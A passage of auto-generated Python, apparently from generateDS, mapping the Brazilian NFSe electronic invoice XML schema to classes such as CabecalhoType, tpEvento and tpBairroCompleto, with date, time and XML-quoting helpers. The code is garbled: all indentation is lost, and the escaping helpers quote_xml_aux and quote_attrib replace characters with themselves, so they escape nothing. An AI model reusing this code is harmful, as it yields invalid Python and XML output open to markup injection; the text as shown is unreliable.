dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(
hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node=None, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_validate_simple_patterns(self, patterns, target):
# pat is a list of lists of strings/patterns. We should:
# - AND the outer elements
# - OR the inner elements
found1 = True
for patterns1 in patterns:
found2 = False
for patterns2 in patterns1:
if re_.search(patterns2, target) is not None:
found2 = True
break
if not found2:
found1 = False
break
return found1
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
@staticmethod
def gds_encode(instring):
if sys.version_info.major == 2 and not isinstance(instring, unicode):
return instring.encode(ExternalEncoding)
else:
return instring
@staticmethod
def convert_unicode(instring):
if isinstance(instring, str):
result = quote_xml(instring)
elif sys.version_info.major == 2 and isinstance(instring, unicode):
result = quote_xml(instring).encode('utf8')
else:
result = GeneratedsSuper.gds_encode(str(instring))
return result
def __eq__(self, other):
if type(self) != type(other):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
def getSubclassFromModule_(module, class_):
'''Get the subclass of a class from a specific module.'''
name = class_.__name__ + 'Sub'
if hasattr(module, name):
return getattr(module, name)
else:
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'utf-8'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
CDATA_pattern_ = re_.compile(r"<!\[CDATA\[.*?\]\]>", re_.DOTALL)
# Change this to redirect the generated superclass module to use a
# specific subclass module.
CurrentSubclassModule_ = None
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
"Escape markup chars, but do not modify CDATA sections."
if not inStr:
return ''
s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
s2 = ''
pos = 0
matchobjects = CDATA_pattern_.finditer(s1)
for mo in matchobjects:
s3 = s1[pos:mo.start()]
s2 += quote_xml_aux(s3)
s2 += s1[mo.start():mo.end()]
pos = mo.end()
s3 = s1[pos:]
s2 += quote_xml_aux(s3)
return s2
def quote_xml_aux(inStr):
s1 = inStr.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace,
pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(
outfile, level, namespace, name,
pretty_print=pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0,
optional=0, child_attrs=None, choice=None,
documentation=""):
self.name = name
self.data_type = data_type
self.container = container
self.child_attrs = child_attrs
self.choice = choice
self.optional = optional
self.documentation = documentation
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def set_child_attrs(self, child_attrs): self.child_attrs = child_attrs
def get_child_attrs(self): return self.child_attrs
def set_choice(self, choice): self.choice = choice
def get_choice(self): return self.choice
def set_optional(self, optional): self.optional = optional
def get_optional(self): return self.optional
def get_documentation(self): return self.documentation
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class ReqConsultaNFSeRPS(GeneratedsSuper):
"""Schema utilizado para Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, Cabecalho=None, Lote=None, Signature=None):
self.original_tagname_ = None
self.Cabecalho = Cabecalho
self.Lote = Lote
self.Signature = Signature
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ReqConsultaNFSeRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ReqConsultaNFSeRPS.subclass:
return ReqConsultaNFSeRPS.subclass(*args_, **kwargs_)
else:
return ReqConsultaNFSeRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Cabecalho is not None or
self.Lote is not None or
self.Signature is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='ReqConsultaNFSeRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ReqConsultaNFSeRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ReqConsultaNFSeRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='ReqConsultaNFSeRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='ReqConsultaNFSeRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='ReqConsultaNFSeRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Cabecalho is not None:
self.Cabecalho.export(outfile, level, namespace_, name_='Cabecalho', pretty_print=pretty_print)
if self.Lote is not None:
self.Lote.export(outfile, level, namespace_, name_='Lote', pretty_print=pretty_print)
if self.Signature is not None:
self.Signature.export(outfile, level, namespace_='ds:', name_='Signature', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Cabecalho':
obj_ = CabecalhoType.factory()
obj_.build(child_)
self.Cabecalho = obj_
obj_.original_tagname_ = 'Cabecalho'
elif nodeName_ == 'Lote':
obj_ = tpLoteConsultaNFSe.factory()
obj_.build(child_)
self.Lote = obj_
obj_.original_tagname_ = 'Lote'
elif nodeName_ == 'Signature':
obj_ = SignatureType.factory()
obj_.build(child_)
self.Signature = obj_
obj_.original_tagname_ = 'Signature'
# end class ReqConsultaNFSeRPS
class CabecalhoType(GeneratedsSuper):
"""Cabeçalho do pedido."""
subclass = None
superclass = None
def __init__(self, CodCidade=None, CPFCNPJRemetente=None, transacao=True, Versao=None):
self.original_tagname_ = None
self.CodCidade = CodCidade
self.validate_tpCodCidade(self.CodCidade)
self.CPFCNPJRemetente = CPFCNPJRemetente
self.validate_tpCPFCNPJ(self.CPFCNPJRemetente)
self.transacao = transacao
self.Versao = Versao
self.validate_tpVersao(self.Versao)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, CabecalhoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if CabecalhoType.subclass:
return CabecalhoType.subclass(*args_, **kwargs_)
else:
return CabecalhoType(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpCodCidade(self, value):
# Validate type tpCodCidade, a restriction on xs:unsignedInt.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpCodCidade' % {"value" : value} )
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpVersao(self, value):
# Validate type tpVersao, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpVersao_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpVersao_patterns_, ))
validate_tpVersao_patterns_ = [['^[0-9]{1,3}$']]
def hasContent_(self):
if (
self.CodCidade is not None or
self.CPFCNPJRemetente is not None or
not self.transacao or
self.Versao is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='CabecalhoType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('CabecalhoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='CabecalhoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='CabecalhoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='CabecalhoType'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='CabecalhoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.CodCidade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodCidade>%s</ns1:CodCidade>%s' % (self.gds_format_integer(self.CodCidade, input_name='CodCidade'), eol_))
if self.CPFCNPJRemetente is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJRemetente>%s</ns1:CPFCNPJRemetente>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJRemetente), input_name='CPFCNPJRemetente')), eol_))
if self.transacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:transacao>%s</ns1:transacao>%s' % (self.gds_format_boolean(self.transacao, input_name='transacao'), eol_))
if self.Versao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Versao>%s</ns1:Versao>%s' % (self.gds_format_integer(self.Versao, input_name='Versao'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'CodCidade':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CodCidade')
self.CodCidade = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.CodCidade)
elif nodeName_ == 'CPFCNPJRemetente':
CPFCNPJRemetente_ = child_.text
CPFCNPJRemetente_ = self.gds_validate_string(CPFCNPJRemetente_, node, 'CPFCNPJRemetente')
self.CPFCNPJRemetente = CPFCNPJRemetente_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJRemetente)
elif nodeName_ == 'transacao':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'transacao')
self.transacao = ival_
elif nodeName_ == 'Versao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'Versao')
self.Versao = ival_
# validate type tpVersao
self.validate_tpVersao(self.Versao)
# end class CabecalhoType
class tpBairroCompleto(GeneratedsSuper):
"""Informações do Bairro com o seu Tipo."""
subclass = None
superclass = None
def __init__(self, TipoBairro=None, NomeBairro=None):
self.original_tagname_ = None
self.TipoBairro = TipoBairro
self.validate_tpTipoBairro(self.TipoBairro)
self.NomeBairro = NomeBairro
self.validate_tpBairro(self.NomeBairro)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpBairroCompleto)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpBairroCompleto.subclass:
return tpBairroCompleto.subclass(*args_, **kwargs_)
else:
return tpBairroCompleto(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpTipoBairro(self, value):
# Validate type tpTipoBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
def validate_tpBairro(self, value):
# Validate type tpBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.TipoBairro is not None or
self.NomeBairro is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpBairroCompleto', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpBairroCompleto')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpBairroCompleto')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpBairroCompleto', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpBairroCompleto'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpBairroCompleto', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.TipoBairro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoBairro>%s</ns1:TipoBairro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoBairro), input_name='TipoBairro')), eol_))
if self.NomeBairro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NomeBairro>%s</ns1:NomeBairro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NomeBairro), input_name='NomeBairro')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'TipoBairro':
TipoBairro_ = child_.text
TipoBairro_ = self.gds_validate_string(TipoBairro_, node, 'TipoBairro')
self.TipoBairro = TipoBairro_
# validate type tpTipoBairro
self.validate_tpTipoBairro(self.TipoBairro)
elif nodeName_ == 'NomeBairro':
NomeBairro_ = child_.text
NomeBairro_ = self.gds_validate_string(NomeBairro_, node, 'NomeBairro')
self.NomeBairro = NomeBairro_
# validate type tpBairro
self.validate_tpBairro(self.NomeBairro)
# end class tpBairroCompleto
class tpEvento(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Codigo=None, Descricao=None, ChaveRPS=None, ChaveNFe=None):
self.original_tagname_ = None
self.Codigo = Codigo
self.validate_tpCodigoEvento(self.Codigo)
self.Descricao = Descricao
self.validate_tpDescricaoEvento(self.Descricao)
self.ChaveRPS = ChaveRPS
self.ChaveNFe = ChaveNFe
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpEvento)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpEvento.subclass:
return tpEvento.subclass(*args_, **kwargs_)
else:
return tpEvento(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpCodigoEvento(self, value):
# Validate type tpCodigoEvento, a restriction on xs:short.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCodigoEvento_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCodigoEvento_patterns_, ))
validate_tpCodigoEvento_patterns_ = [['^[0-9]{3,4}$']]
def validate_tpDescricaoEvento(self, value):
# Validate type tpDescricaoEvento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 300:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDescricaoEvento' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDescricaoEvento' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.Codigo is not None or
self.Descricao is not None or
self.ChaveRPS is not None or
self.ChaveNFe is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpEvento', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpEvento')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpEvento')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpEvento', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpEvento'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpEvento', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Codigo is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Codigo>%s</ns1:Codigo>%s' % (self.gds_format_integer(self.Codigo, input_name='Codigo'), eol_))
if self.Descricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Descricao>%s</ns1:Descricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Descricao), input_name='Descricao')), eol_))
if self.ChaveRPS is not None:
self.ChaveRPS.export(outfile, level, namespace_, name_='ChaveRPS', pretty_print=pretty_print)
if self.ChaveNFe is not None:
self.ChaveNFe.export(outfile, level, namespace_, name_='ChaveNFe', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Codigo':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'Codigo')
self.Codigo = ival_
# validate type tpCodigoEvento
self.validate_tpCodigoEvento(self.Codigo)
elif nodeName_ == 'Descricao':
Descricao_ = child_.text
Descricao_ = self.gds_validate_string(Descricao_, node, 'Descricao')
self.Descricao = Descricao_
# validate type tpDescricaoEvento
self.validate_tpDescricaoEvento(self.Descricao)
elif nodeName_ == 'ChaveRPS':
obj_ = tpChaveRPS.factory()
obj_.build(child_)
self.ChaveRPS = obj_
obj_.original_tagname_ = 'ChaveRPS'
elif nodeName_ == 'ChaveNFe':
obj_ = tpChaveNFe.factory()
obj_.build(child_)
self.ChaveNFe = obj_
obj_.original_tagname_ = 'ChaveNFe'
# end class tpEvento
class tpCPFCNPJ2(GeneratedsSuper):
"""Tipo que representa um CPF/CNPJ."""
subclass = None
superclass = None
def __init__(self, CPF=None, CNPJ=None):
self.original_tagname_ = None
self.CPF = CPF
self.validate_tpCPF(self.CPF)
self.CNPJ = CNPJ
self.validate_tpCNPJ(self.CNPJ)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpCPFCNPJ2)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpCPFCNPJ2.subclass:
return tpCPFCNPJ2.subclass(*args_, **kwargs_)
else:
return tpCPFCNPJ2(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpCPF(self, value):
# Validate type tpCPF, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPF_patterns_, value):
